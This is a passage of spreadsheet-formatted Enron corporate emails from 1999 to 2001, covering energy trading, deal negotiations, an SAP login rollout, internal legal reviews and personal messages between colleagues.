 &lt;&lt;Swap Confirm Template.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Travis J. Brock_x000D_
Merchant Energy Group of the Americas_x000D_
brockt@merchantenergy.com_x000D_
Phone: (410) 295-1734_x000D_
Fax: (410) 295-1705_x000D_
_x000D_
_x000D_
CONFIDENTIALITY NOTICE: This e-mail may contain TRADE SECRET, PRIVILEGED_x000D_
AND/OR CONFIDENTIAL INFORMATION intended only for the use of the addressee._x000D_
If you are not the addressee, or the person responsible for delivering it to_x000D_
the person addressed, you may not copy or deliver this to anyone else.  If_x000D_
you received this e-mail by mistake, please immediately notify us by_x000D_
returning the original message to the sender._x000D_
_x000D_
_x000D_
 - Swap Confirm Template.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 14:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robin@perfect.com'})</t>
  </si>
  <si>
    <t>Re: Conf call with Cameron and Ian</t>
  </si>
  <si>
    <t xml:space="preserve">8 AM. 10 AM. 3 PM._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Robin Deguara &lt;robin@perfect.com&gt; 06/29/2001 06:51 PM 	   To: "'jeff_dasovich@enron.com'" &lt;jeff_dasovich@enron.com&gt;  cc:   Subject: Conf call with Cameron and Ian	_x000D_
_x000D_
_x000D_
_x000D_
Jeff,_x000D_
_x000D_
Please provide me with three time slots you would be available to have a_x000D_
conf call on Friday the 6th between Cameron and Ian. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Robin Deguara_x000D_
Executive Assistant_x000D_
 &lt;&lt;...OLE_Obj...&gt;&gt; _x000D_
Perfect Commerce, Inc. tel: 650-798-3367_x000D_
fax: 650-858-1095 email: robin@perfect.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Jun 2000 02:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'amy@thehallagency.com'})</t>
  </si>
  <si>
    <t>What's Up?</t>
  </si>
  <si>
    <t>Hey!? What's up?? How's your new job  going?? Just wanted to touch base with _x000D_
you.? How's Jenn?? Michael  &amp; I are doing great, still loving our house!? _x000D_
There's really nothing  new to speak of.? Anything in your life?? Entertain _x000D_
me. _x000D_
?_x000D_
Amy E. Hood_x000D_
The Hall Agency_x000D_
(214) 559-4255_x000D_
(214) 559-0032 fax_x000D_
amy@thehallagency.com_x000D_
??</t>
  </si>
  <si>
    <t>Thu, 30 Dec 1999 01:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Drafting Committee Meeting for Products Definition</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Elizabeth Sager/HOU/ECT on 12/30/99 09:22 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Andy Katz" &lt;AKatz@eei.org&gt; on 12/22/99 03:50:04 PM_x000D_
To: fmdutton@aep.com, Elizabeth Sager/HOU/ECT@ECT, mroger3@entergy.com, _x000D_
wfhenze@jonesday.com, KDLEITAO@LLGM.COM, rosteen@powersrc.com_x000D_
cc: hemu@dynegy.com, MPhilips@pwrteam.com, drusso@reliantenergy.com _x000D_
Subject: Drafting Committee Meeting for Products Definition_x000D_
_x000D_
_x000D_
_x000D_
The Drafting Committee will meet on Janurary 13 at EEI's offices to develop _x000D_
consensus language for products definitions in the Contract.  This would be _x000D_
in preparation for a meeting of the entire working group in Houston on either _x000D_
Janurary 25 or 26.    We would like to have Reliant, Dynegy, and PECO serve _x000D_
on the drafting committee since your companies' have concrete proposals on _x000D_
the table.  Several of you have already indicated that you will be available _x000D_
for this meeting, will the others please let me know your availability.  _x000D_
Thanks._x000D_
_x000D_
Have a great holiday and a Happy New Year!_x000D_
_x000D_
Andrew S. Katz, Senior Attorney_x000D_
Edison Electric Institute_x000D_
701 Pennsylvania Avenue, N.W._x000D_
Washington, D.C.  20004_x000D_
Voice:  202-508-5616_x000D_
Fax:     202-508-5673_x000D_
e-mail:  akatz@eei.org_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 14:31:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lhost@ecc.net'})</t>
  </si>
  <si>
    <t>Support the Bronco's and the WTC Victims</t>
  </si>
  <si>
    <t xml:space="preserve">This really only takes 30 seconds.  See below._x000D_
_x000D_
I just did it!  It's fast and easy.  So no excuses for not getting soup_x000D_
donated.  All of you have 1 minute to spare! People in New York and DC are_x000D_
going to be having to hit foodbanks hard. There will be a need in NY for_x000D_
the soup.  Below is an easy way to help...._x000D_
_x000D_
Campbell's is donating a can of soup to area foodbanks just by clicking on_x000D_
a football helmet at their website. Now, I know there are some pretty_x000D_
diehard football fans out there._x000D_
_x000D_
Let's see which team gets the most support and help some hungry people,_x000D_
too! It's quick, easy, and can be done once a day.  To date Steelers have_x000D_
about 240,000 cans donated - Green Bay has over 254,000._x000D_
_x000D_
The Broncos only have 61,000.  Come of Fans, kick in your support._x000D_
_x000D_
Here is a hyper link to directly connect you to their website. Just click_x000D_
on this web address:  http://www.chunky.com/click_for_cans.asp_x000D_
then click on your favorite team's helmet and Campbell will donated a can_x000D_
of soup.  That is it!  Please pass this to a friend or 2,3,4..._x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 May 2000 23:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Modeling Methodology for Florida Merchant Generation</t>
  </si>
  <si>
    <t>Ben:_x000D_
I talked with Thomas Suffield and he wants Miguel Vasquez to run the numbers _x000D_
on the Florida model., since they have been running numbers on the Plano _x000D_
model for a little while now.  I walked Miguel through what I had done and _x000D_
how they should look at running the model, based on what Thomas found out and _x000D_
what you have said in the past.  I also gave them the numbers that the desk _x000D_
has given based on the simple cycle case (5 year number) and combine-cycle _x000D_
case (5 year number).  From this they have modeled and graphed these _x000D_
different scenarios.  I also worked on getting a bid and ask from the desk, _x000D_
but you may need to talk to Berney because they are not giving out the ask at _x000D_
this time.  _x000D_
Hope this helps and please give me a call if you have any questions. Thanks_x000D_
Ben_x000D_
3-7998</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 11:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sap.3@enron.com'})</t>
  </si>
  <si>
    <t>SAP ID - Here it is!!!!!</t>
  </si>
  <si>
    <t>The following SAP ID and Password allows you to access pay, benefit, and _x000D_
personal data via eHROnline.  Do NOT provide this ID/Password to anyone as it _x000D_
enables modification to direct deposit account information._x000D_
_x000D_
The SAP system AND eHROnline will be available beginning _x000D_
FRIDAY, JUNE 23 at 8:00 AM for TIME ENTRY.  _x000D_
Full SAP functionality for financials will be available on July 5, 2000._x000D_
_x000D_
_x000D_
_x000D_
You will be asked to change your password at the initial logon.  Your NEW _x000D_
password should meet the following criteria:_x000D_
Must be 6-8 characters long_x000D_
Can include numbers and letters_x000D_
Can NOT include 'enron' in your password._x000D_
The system will require you to change your password every 90 days._x000D_
_x000D_
_x000D_
The following address will connect you to eHRonline beginning FRIDAY, JUNE 23 _x000D_
at 8:00AM,  http://eHRonline.enron.com_x000D_
(Must use Internet Explorer, version 4.01 or higher to access this link.)_x000D_
_x000D_
_x000D_
How do I get help?:_x000D_
_x000D_
_x000D_
SAP Support:_x000D_
Call the COE SAP Hotline at 713-345-4SAP (4727)._x000D_
_x000D_
For Quick Reference Tools, Security Request Processes, after hours contact _x000D_
information and other general information, go to the COE web site via _x000D_
Internet Explorer using the following URL address:  _x000D_
http://sap.enron.com/coe_x000D_
_x000D_
For Troubleshooting and Go-Live Tips, go to the following web site, via _x000D_
Internet Explorer, using the following URL address:_x000D_
http://sap.enron.com/coe_x000D_
Click on SAP, then click on Troubleshooting and Go-Live Tips_x000D_
_x000D_
Training:_x000D_
Contact your site manager if you were not able to attend a SAP training _x000D_
class, and would like to attend one,_x000D_
 for approval and role assignment._x000D_
_x000D_
For interactive web based training for eHRonline time entry, go to the _x000D_
following web site, via Internet Explorer,_x000D_
using the following URL address:_x000D_
http://www.enroncast.com_x000D_
Select the "New Users Click Here to Register" link</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 13:25:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike.mcconnell@enron.com', 'a..shankman@enron.com', 'l..nowlan@enron.com'})</t>
  </si>
  <si>
    <t>Project OZ update</t>
  </si>
  <si>
    <t>Below is a summary of my discussion w/ Norman Abood (General Counsel for GAF) in response to our termination letter dated 10/16/01 and his written response on 10/17.  Basically, I told Norman it was time to stop the paper trail and either get down to closing or go our separate ways.  I emphasized our primary concerns as follows:_x000D_
  _x000D_
	1.  GAF's ability to fund its equity_x000D_
	2.  finalizing the feedstock supply and products off-take_x000D_
	3.  Morgan's commitment to finance the debt _x000D_
	4.  defining the pool of assets to be collateralized_x000D_
	5.  evidence of insurability, and _x000D_
	6.  restructuring of GAF's PSA w/ Farmland._x000D_
_x000D_
I also emphasized our frustration over the "continually moving targets" (debt, collateral, equity, feedstocks, etc...) and told him I will NOT continue to expend resources and time playing games.  Finally, I told him I was willing to re-engage on the following terms:_x000D_
_x000D_
	a.  GAF submit either a written set of comments to our 9/21 MOU or a counter-proposal to us by Monday, 10/22._x000D_
	b.  If, subject to OUR review and based on US believing there's merit to proceed that we get ALL PARTIES (GAF, 	     Morgan Stanley and EGM) together and hammer out a definitive and final version of the MOU including, but not 		     limited to the primary concerns above (w/ all parties having "subject to senior management and/or Board approval" 	     language/conditions).  The purpose here is to get all the T&amp;C down in writing with everyone in the room in 	     conceptual agreement which will make it more difficult for the targets to move._x000D_
	c.  Morgan Stanley must be willing to sign some form of commitment letter evidencing their willingness to finance the 	     transaction._x000D_
_x000D_
GAF will then have some finite/specific period of time in which to approach Farmland and restructure their deal as necessary to close the transaction._x000D_
_x000D_
Norman agreed in principle and committed to get back to us by tomorrow.  Hopefully, this will once and for all define whether or not this deal can get done._x000D_
_x000D_
Randy Maffett_x000D_
Vice President - Enron Global Markets_x000D_
Office:     (713)853-3212_x000D_
e-mail:     randal.maffett@enron.com_x000D_
_x000D_
Assistant:     Beth Ryan (713)345-7161_x000D_
                  beth.a.ryan@enron.com</t>
  </si>
  <si>
    <t>Sun, 6 May 2001 11:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>eThink About It: 5/7/01</t>
  </si>
  <si>
    <t>Thursday, May 10 at 10 a.m. Houston time, join Billy Lemmons on eSpeak.  _x000D_
Billy, vice president of the Associate/Analyst Program will answer your _x000D_
questions in an "open mike" event._x000D_
Have a question, but you can't make the live event?  Pre-submit your _x000D_
questions now on eSpeak, and come back to read the transcript later.</t>
  </si>
  <si>
    <t>Wed, 31 May 2000 08:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.simons@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Re: additional names</t>
  </si>
  <si>
    <t xml:space="preserve">now that we are officially behind a chinese wall can this process be _x000D_
reevaluated?  I think that it will be increasingly difficult to scale at the _x000D_
pace we need to over the coming months if we can not design an automated _x000D_
process.  Are we trying to avoid actually misusing confidential information _x000D_
or the perception of misusing the information?  our intent is to begin to _x000D_
scale on a massive level from now until we have reached over a million _x000D_
reference credits._x000D_
_x000D_
bs_x000D_
_x000D_
_x000D_
_x000D_
From: Mark Taylor on 31/05/2000 09:29 CDT_x000D_
To: Bryan Seyfried/LON/ECT@ECT_x000D_
cc: Denis O'Connell/LON/ECT@ECT, Edmund Cooper/LON/ECT@ECT, Markus _x000D_
Fiala/LON/ECT@ECT, Paul Simons/LON/ECT@ECT, Rod Nelson/HOU/ECT@ECT, Tomas _x000D_
Valnek/LON/ECT@ECT, William S Bradford/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: additional names  _x000D_
_x000D_
Bryan -_x000D_
_x000D_
The process for approving these involves sending the names to the General _x000D_
Counsels of the various operating companies here in Houston.  Several of them _x000D_
then send the lists to the senior business people in their organizations.  _x000D_
Unless there is a real urgency, I would suggest that we send the list all at _x000D_
once instead of piecemeal.  What do you think?_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
	Bryan Seyfried_x000D_
	05/30/2000 08:09 AM_x000D_
		 _x000D_
		 To: Rod Nelson/HOU/ECT@ECT, Paul Simons/LON/ECT@ECT, Edmund _x000D_
Cooper/LON/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Denis O'Connell/LON/ECT@ECT_x000D_
		 cc: Markus Fiala/LON/ECT@ECT, William S Bradford/HOU/ECT@ECT, Tomas _x000D_
Valnek/LON/ECT@ECT_x000D_
		 Subject: additional names_x000D_
_x000D_
We are in the process of selecting a large number of reference credits to be _x000D_
approved for display on the web site.  Our intention is to have 1000 names on _x000D_
line by the end of the quarter.  We are internally scrubbing the lists now _x000D_
and will forward them soon.  In the meantime, can we get approval to quote _x000D_
the following on line:_x000D_
_x000D_
Transocean Sedco Forex Inc._x000D_
KPN N.V._x000D_
Deutsche Telekom_x000D_
Technost International_x000D_
Vivendi_x000D_
Ryder Systems_x000D_
Petrocanada_x000D_
_x000D_
thanks_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 05:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brenda.fletcher@enron.com', 'sherry.anastas@enron.com'})</t>
  </si>
  <si>
    <t>Jan Transport</t>
  </si>
  <si>
    <t xml:space="preserve">I'm going through the Jan transport invoices.  I see I need to bill CES for _x000D_
some South Georgia activity.  How did we pay South Georgia, I don't see a _x000D_
matrix in Unify._x000D_
</t>
  </si>
  <si>
    <t>Tue, 4 Apr 2000 08:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>UK RPI model</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Zimin!_x000D_
_x000D_
Please find attached for your  review the UK RPI model, derived by _x000D_
bootstrapping RPI swaps. _x000D_
_x000D_
It's a very simple model and here are its specifics:_x000D_
_x000D_
SWAP STRUCTURE_x000D_
_x000D_
Payment: semi/semi Act/365F_x000D_
&gt;_x000D_
&gt; YOYUKRPI = (UKRPI(p-2)/UKRPI(p-14) - 1)/2_x000D_
&gt; p = payment month_x000D_
&gt;_x000D_
_x000D_
The first payment is the latest known historical RPI, February 2000, 2.32%. _x000D_
_x000D_
ASSUMPTIONS_x000D_
_x000D_
* Constant cashflows between the quoted years (as opposed to interpolating _x000D_
swaps which distorts the curve a lot). This explains the atrocious look of _x000D_
the "raw" curve. It is then smoothed with a macro, which Anjam wrote._x000D_
_x000D_
* Mid point of the swaps is used for deriving the curve;_x000D_
_x000D_
* Discount rate is LIBOR and I solve for the coupon rate, which is the RPI _x000D_
YOY rate;_x000D_
_x000D_
_x000D_
_x000D_
* The above is solved separately for each quoted period (e.g. 2 yrs, 5 yrs) _x000D_
and RPI rates are determined for the incremental portion._x000D_
_x000D_
By forecasting RPI in the above method we are able to lock in and deliver the _x000D_
forecasted levels._x000D_
_x000D_
Looking forward to your comments and seeing you in London!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Martina_x000D_
x34327_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 10:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: DRAFT PRESS RELEASE: NBP Announces Intent to Purchase ENA_x000D_
 Assets in Powder River and Wind River Basins</t>
  </si>
  <si>
    <t xml:space="preserve">If you are interested, here is the marketing affiliate assessment of the _x000D_
transaction._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Shelley Corman/ET&amp;S/Enron on 08/22/2000 _x000D_
05:47 PM ---------------------------_x000D_
_x000D_
_x000D_
Shelley Corman_x000D_
08/22/2000 05:34 PM_x000D_
To: Steven J Kean/NA/Enron@Enron_x000D_
cc: Eric Thode/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Re: DRAFT PRESS RELEASE: NBP Announces Intent to Purchase ENA Assets _x000D_
in Powder River and Wind River Basins  _x000D_
_x000D_
_x000D_
The newly acquired gathering assets will be operated by employees of NBP _x000D_
Services Corp., whereas Northern Border Pipeline is operated by Northern _x000D_
Plains employees.  There will be no common officers between NBP Services and _x000D_
Northern Plains and no shared employees.  Thus, NBP Services employees as _x000D_
operator of non-jurisdictional assets will not be subject to the marketing _x000D_
affiliate rules and will be free to work in a complementary work relationship _x000D_
with ENA._x000D_
_x000D_
The press release makes it sound like Northern Border will operate both the _x000D_
jurisdictional and non-jurisdictional assets.  You may want to make it clear _x000D_
that Northern Border Pipeline is operated by Northern Plains._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steven J Kean_x000D_
08/22/2000 04:50 PM_x000D_
Sent by: Steven J Kean_x000D_
To: Eric Thode/Corp/Enron@ENRON, Shelley Corman/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: DRAFT PRESS RELEASE: NBP Announces Intent to Purchase ENA Assets in _x000D_
Powder River and Wind River Basins_x000D_
_x000D_
Eric - I think the release looks fine._x000D_
_x000D_
Shelley -- I take it there are no affiliate issues here (or they have been _x000D_
fully vetted)?_x000D_
---------------------- Forwarded by Steven J Kean/NA/Enron on 08/22/2000 _x000D_
04:49 PM ---------------------------_x000D_
_x000D_
_x000D_
Eric Thode_x000D_
08/22/2000 11:34 AM_x000D_
To: Mark Frevert/NA/Enron@Enron, David W Delainey/HOU/ECT@ECT, John J _x000D_
Lavorato/Corp/Enron@Enron, Brian Redmond/HOU/ECT@ECT, Shonnie _x000D_
Daniel/HOU/ECT@ECT, Mark Whitt/DEN/ECT@Enron, Brian Bierbach/DEN/ECT@Enron, _x000D_
Jean Mrha/NA/Enron@Enron, Mark E Haedicke/HOU/ECT@ECT, Kenneth _x000D_
Lay/Corp/Enron@ENRON, Jeff Skilling/Corp/Enron@ENRON, Mark _x000D_
Koenig/Corp/Enron@ENRON, Paula Rieker/Corp/Enron@ENRON, Kathryn _x000D_
Corbally/Corp/Enron@ENRON, Scott Vonderheide/Corp/Enron@ENRON, Steven J _x000D_
Kean/NA/Enron@Enron, Mark Palmer/Corp/Enron@ENRON, Karen _x000D_
Denne/Corp/Enron@ENRON, Andrew S Fastow/HOU/ECT@ECT, Rex _x000D_
Rogers/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: DRAFT PRESS RELEASE: NBP Announces Intent to Purchase ENA Assets in _x000D_
Powder River and Wind River Basins_x000D_
_x000D_
Attached is a draft press release regarding NBP's intent to purchase ENA's _x000D_
assets in the Powder River and Wind River Basins.  Please return all comments _x000D_
to me via e-mail by 5:00 pm on Tuesday, August 22.  If you have any _x000D_
questions, please call me at ext. 3-9053._x000D_
_x000D_
Thanks._x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 01:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Shane,_x000D_
_x000D_
Thanks for your message.  As a matter of fact, I expected your resume in time_x000D_
for our summer internship program._x000D_
_x000D_
We shall be glad to invite you for an interview. How long "sabbatical" do you _x000D_
envisage?_x000D_
_x000D_
Vince_x000D_
_x000D_
P.S. Shirley,   please, call Shane to arrange an interview with HR._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Shane Green" &lt;shanecgreen@earthlink.net&gt; on 06/19/2000 02:14:00 PM_x000D_
To: &lt;vkamins@enron.com&gt;_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
Dr. Kaminski:_x000D_
?_x000D_
You probably won't remember my name, but I am the Ph.D.  student that took _x000D_
you back to the airport after your visit to Louisiana State  University _x000D_
during the previous academic year._x000D_
?_x000D_
I received my M.S. in Finance in May of last year, and chose  to?remain at _x000D_
LSU to work on my Ph.D. At that time, I intended to pursue a  career _x000D_
in?teaching and research at a four year college or university.?  In _x000D_
part?because of your visit,?and my?primary interest in  normative research, _x000D_
my?plans have changed.? While I?still want to  earn my Ph.D.,?I plan to _x000D_
pursue a career in research in the private  sector._x000D_
?_x000D_
As you know, Ph.D. programs in financial economics are  designed to train _x000D_
future academics.? Not surprisingly, they emphasize  methods to approach the _x000D_
types of questions that are of interest to finance  academics.? What did _x000D_
surprise me, however, was that these areas of interest  often had little to _x000D_
do with what I imagined to be the concerns of practitioners  in the real _x000D_
world.? As you mentioned in your discussion, academic  researchers know _x000D_
little about what their counterparts in the private sector  _x000D_
are?doing.?????????????????????????????????????  _x000D_
?_x000D_
In light of my objective, I feel I would get the most out of  the remainder _x000D_
of my doctoral studies if I took some time off to work in the  private sector _x000D_
to see first hand the?types of challenges I can expect to  face as a _x000D_
researcher in corporate America.? As my primary interests revolve  around the _x000D_
use of derivatives and financial engineering in corporate risk  management, _x000D_
Enron, as the leading innovator in these areas, would be an ideal  place to _x000D_
learn.? I was wondering if you were aware of any openings at the  company _x000D_
that might provide me with the exposure I am looking for.? If there  are no _x000D_
such positions or opportunities, any advice or suggestions you could give  _x000D_
me,?such as whether or not you think such a "sabbatical" (for lack of a  _x000D_
better term) would be helpful, or information on private sector careers for  _x000D_
Ph.D.'s would be greatly appreciated.? _x000D_
?_x000D_
I am sending a current copy of my vita as an attachment.?  If you have any _x000D_
questions my e-mail address is sgreen@finance.lsu.edu.? Thanks  for your help _x000D_
and advice._x000D_
?_x000D_
?_x000D_
Cordially,_x000D_
?_x000D_
?_x000D_
?_x000D_
?_x000D_
Shane Green_x000D_
?_x000D_
?_x000D_
????? _x000D_
 - Vita.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please print out and put in my QLR binder.  Mark_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 11/21/2000 11:26 AM -----_x000D_
_x000D_
	Peter Keohane_x000D_
	Sent by: Sharon Crawford_x000D_
	11/20/2000 11:51 AM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: Chris Gaffney/TOR/ECT@ECT_x000D_
		 Subject: _x000D_
_x000D_
Mark, for the Quarterly Legal Review (tomorrow 8:00 a.m. Calgary, 9:00 a.m. _x000D_
Houston, 10:00 a.m. Toronto), I attach the following, which you may want to _x000D_
speak to:_x000D_
_x000D_
1. current Enron Canada Legal Status Report;_x000D_
2. Enron Canada Outside Legal Fees - 2000 Report; and_x000D_
3. Enron Canada Legal Budget - 2000 and 2001 (salaries and outside legal _x000D_
expenses only)._x000D_
_x000D_
Regards,_x000D_
Peter_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 01:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Sara Shackleton/HOU/ECT on 08/17/2000 08:40 AM -----_x000D_
_x000D_
	Paul Simons_x000D_
	08/17/2000 07:33 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: Lin Richardson/LON/ECT@ECT_x000D_
		 Subject: FX Transactions_x000D_
_x000D_
FYI, Sara_x000D_
_x000D_
Lin - please put on SFA file - thanks_x000D_
---------------------- Forwarded by Paul Simons/LON/ECT on 17/08/2000 13:35 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Jon Barrett@MGLTD_x000D_
07/08/2000 11:34_x000D_
To: Paul Simons/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: FX Transactions_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jon Barrett/MGLTD_London/MGLTD on _x000D_
07/08/2000 11:31 ---------------------------_x000D_
_x000D_
_x000D_
GILBERGD@sullcrom.com on 06/08/2000 15:45:55_x000D_
To: jbarrett_x000D_
cc: RAISLERK@sullcrom.com _x000D_
_x000D_
Subject: FX Transactions_x000D_
_x000D_
_x000D_
_x000D_
eSafe Protect Gateway (tm) has scanned this mail for viruses, vandals and_x000D_
suspicious attachments and has found it to be CLEAN._x000D_
_x000D_
File: 62cy01!.DOC (38,400 bytes)_x000D_
Encoding: Base64_x000D_
Result: Clean._x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
Attached is a draft of the memo we discussed on the proposed FX business. _x000D_
Please call or e-mail with any questions.  Best regards._x000D_
_x000D_
_x000D_
----------------------------------_x000D_
_x000D_
This e-mail is sent by a law firm and contains information_x000D_
that may be privileged and confidential. If you are not the_x000D_
intended recipient, please delete the e-mail and notify us_x000D_
immediately._x000D_
_x000D_
 - 62cy01!.DOC_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 11:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Versao Resumida</t>
  </si>
  <si>
    <t xml:space="preserve">Rick_x000D_
Tks for your time. I felt more confident._x000D_
_x000D_
As I promised, please find enclosed abidged versions of larger documents. _x000D_
They may give you a good idea on what is going on. I should be preparing _x000D_
weekly updates to our Executive Committee. I'll forward them to you as well._x000D_
_x000D_
LM_x000D_
---------------------- Forwarded by Luiz Maurer/SA/Enron on 05/25/2001 06:45 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Orlando Gonzalez_x000D_
05/14/2001 08:54 AM_x000D_
To: Luiz Maurer/SA/Enron@Enron_x000D_
cc: Sergio Assad/SA/Enron@Enron, Jose _x000D_
Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joe Kishkill/SA/Enron@Enron, _x000D_
Brett R Wiggs/SA/Enron@Enron, britaldo.soares@enron.com, Remi _x000D_
Collonges/SA/Enron@Enron, Joao.Carlos.Albuquerque@enron.com _x000D_
_x000D_
Subject: Re: Versao Resumida  _x000D_
_x000D_
  Luis  Good summary  Thanks  Please review and comment  Thanks_x000D_
_x000D_
_x000D_
_x000D_
Luiz Maurer_x000D_
11/05/2001 18:58_x000D_
To: Sergio Assad/SA/Enron@Enron, Orlando Gonzalez/SA/Enron@Enron_x000D_
cc: Jose Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Versao Resumida_x000D_
_x000D_
Cf. solicitado hoje, seguem versao resumida e texto longo (com apendices)_x000D_
_x000D_
LM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Feb 2000 05:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mstewart@bmoh.com'})</t>
  </si>
  <si>
    <t>Re: Status</t>
  </si>
  <si>
    <t xml:space="preserve">Yikes!!!!   I can understand your preoccupation with those issues out there.  _x000D_
I am sure that you are all "talked out" about it, but if you need an _x000D_
empathetic ear, give me a buzz.  Talk to you later. _x000D_
_x000D_
Michelle_x000D_
_x000D_
PS  I saw Julie Parraguirre last night, and she told me to say hello.  She is _x000D_
going to be teaching at the same school that Cameron attends! _x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 06:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Yeah you like that?  Aren't you just little miss grammer today!</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dave Schafer</t>
  </si>
  <si>
    <t xml:space="preserve">Donald Vignaroli   11/02/2000 08:28 AM_x000D_
_x000D_
To: Janet Bowers/ET&amp;S/Enron@ENRON, Lisa Costello/NA/Enron@ENRON, Beth _x000D_
Jensen/NPNG/Enron@ENRON, Dana Jones/ET&amp;S/Enron@ENRON, Jane.Joyce/LON/ECT@ECT, _x000D_
Mary Kay Miller/ET&amp;S/Enron@ENRON, Virginia O'Neill/NPNG/Enron@Enron, Sharon _x000D_
Solon/ET&amp;S/Enron@ENRON, Gary Sova/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Dave Schafer_x000D_
_x000D_
Last saturday at Genie's service in Concordia, KS, I talked with Dave and, _x000D_
since he planned to spend most of this week in KC,  agreed to meet in KC for _x000D_
talk and lunch.  (He's in KC to support daughter Angie and to be there on _x000D_
friday when she goes in for an ultrasound.  Keep your fingers crossed - she _x000D_
prefers a girl.)_x000D_
I went down yesterday morning and returned in the afternoon.  Really a swell, _x000D_
if not at times tough, day.  We met and chatted for about 2 hours at his _x000D_
hotel before going to pick up Angie for a 1 - 1 1/2 hour lunch - nice little _x000D_
Italian place, Cafe Italia  :)  :)_x000D_
Obviously, the day was a roller coaster ride of emotions.  However, they both _x000D_
are doing well - Dave perhaps better than Angie - but both are fine.  At _x000D_
times, Dave was his usual "irreverent" self and we enjoyed many chuckles - _x000D_
love to listen to the guy go off.  At other times - perhaps we reminesced too _x000D_
deeply._x000D_
Dave's latest plans are to return to Houston on Saturday.  He mentioned to _x000D_
Angie at lunch that Dana and Robert have requested that he stay with them for _x000D_
awhile and he will do so.  Angie will follow Dave shortly to help him with _x000D_
matters in Houston.  I don't know when she will travel to Houston._x000D_
He also brought up the subject of a memorial service in Omaha.  He was _x000D_
struggling with his emotions - not wanting to hurt any feelings in Omaha but _x000D_
also wanting to get on with the healing process.  He (Angie agreed)  finally _x000D_
decided to forego a service in Omaha - relieved I'm sure._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 13:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>chk vmail when you get a chance. best,jeff</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 09:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Reorg assignments</t>
  </si>
  <si>
    <t xml:space="preserve">FYI-_x000D_
I have yet to officially notify anyone except John Cobb, Bob Chandler and _x000D_
